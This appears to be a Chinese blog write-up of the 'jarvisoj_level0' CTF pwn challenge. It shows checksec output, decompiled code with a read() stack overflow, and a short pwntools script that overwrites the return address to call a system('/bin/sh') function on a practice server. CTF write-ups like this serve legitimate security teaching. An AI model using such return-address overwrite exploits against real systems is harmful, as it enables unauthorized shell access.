加载头像

jarvisoj_level0

Ubuntu 16


0x01


checksec

1
2
3
4
5
6
[*] '/home/zelas/Desktop/pwn/level0/level0'
Arch: amd64-64-little
RELRO: No RELRO
Stack: No canary found
NX: NX enabled //栈不可执行
PIE: No PIE (0x400000)
1
2
$ file level0             
level0: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=8dc0b3ec5a7b489e61a71bc1afa7974135b0d3d4, not stripped

IDA

vulnerable_function()函数

1
2
3
4
5
6
ssize_t vulnerable_function()
{
char buf[128]; // [rsp+0h] [rbp-80h] BYREF

return read(0, buf, 0x200uLL); //read()函数存在栈溢出漏洞
}

可疑函数 callsystem()

1
2
3
4
5
int callsystem()
{
return system("/bin/sh");
}
//0x400596

0x02


思路

1.利用read()函数的栈溢出漏洞溢出至ret

s 80H
rbp 0x8
ret callsystem() 0x400596

0x03


exp

1
2
3
4
5
6
7
8
9
10
11
12
13
from pwn import *

# io = process(['pwn1_sctf_2016'])
io = remote('node4.buuoj.cn', 25420)

callsystem = 0x400596
padding = 0x80 + 0x8

payload = b'a' * padding + p64(callsystem)

io.sendline(payload)
io.interactive()


评论
✅ 你无需删除空行,直接评论以获取最佳展示效果
引用到评论
随便逛逛博客分类文章标签
复制地址关闭热评深色模式轉為繁體